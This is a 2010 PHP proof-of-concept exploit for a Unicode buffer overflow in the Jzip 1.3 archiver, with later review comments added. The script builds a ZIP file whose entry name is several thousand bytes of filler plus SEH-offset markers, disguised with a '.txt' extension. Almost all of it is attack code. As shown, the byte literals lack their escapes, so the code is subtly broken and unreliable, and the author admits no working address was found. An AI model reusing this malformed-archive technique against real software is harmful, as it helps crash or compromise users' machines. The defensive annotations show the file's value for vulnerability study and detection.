# Title : Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC
# Published : 2010-04-06
# Author : mr_me
<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Jzip v1.3 (.zip) Unicode buffer overflow 0day PoC
Date: 6/4/2010
Author: mr_me (http://net-ninja.net/)
Software Link: http://www.jzip.com/
Version: 1.3
Tested on: Windows XP SP3 En
Advisory: http://www.corelan.be:8800/advisories.php?id=10-021
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note:
jzip.exe and all associated modules are compiled with safeseh, and combined
with the unicode limitation this makes exploitation very difficult. We did not
find a working unicode address, otherwise this vulnerability would have been
a lot more fun! The seven moons were not aligned, as Ben puts it :)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
*/
// Fixed layouts for the three ZIP structures the PoC emits. Judging by the
// variable names and the leading "x50x4B" (PK) of each, these are meant to be a
// local file header, a central directory file header and an end of central
// directory record.
// NOTE(review): as shown on this page the literals carry no backslash escapes,
// so PHP evaluates them as the ASCII text "x50x4B..." rather than as bytes; the
// file written at the bottom is therefore not a structurally valid archive as
// written. Presumably the "xe4x0f" pair is the little-endian file-name length
// field (0x0FE4 = 4068), which matches the 4064 + 4 character name built below.
$lf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00";
$cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00".
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";
$efcdr_record = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00x02x10x00x00x00x00";
// Length to which the file-name field is padded before the extension is added.
// Defensive reading: a name of several thousand bytes in a ZIP header is exactly
// the archive-supplied value an extractor must length-check (against the buffer
// it copies into, not against the header's own length field) before use.
$___offset = 4064;
// Two-character filler markers at the positions the author labels nseh/seh.
// The header comment states that no usable unicode address was found, so these
// only mark offsets for a debugger; they are not a working handler chain.
$___nseh = str_repeat("x43",2);
$___seh = str_repeat("x44",2);
// Name body: 810 repeats of the filler, then the two markers.
$___exploit = str_repeat("x41",810).
$___nseh.
$___seh;
// Pad the name up to $___offset characters (strlen is byte-wise, which is what
// is wanted for a binary field) and append what would read ".txt"
// (x2e x74 x78 x74) if the escapes were intact, so the entry looks like an
// ordinary text file to a casual inspection.
$___exploit .=
str_repeat("x41",$___offset-strlen($___exploit)).
"x2ex74x78x74";
// The same overlong name is placed in both the local header and the central
// directory entry, so an extractor that trusts either structure sees it.
// Detection note: entries whose name-length fields are in the thousands are
// anomalous for real archives and are cheap to flag in content inspection.
$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
// Written to the current working directory; the return value (false on
// failure) is not checked.
file_put_contents("cst-jzip.zip",$_____b00m);
?>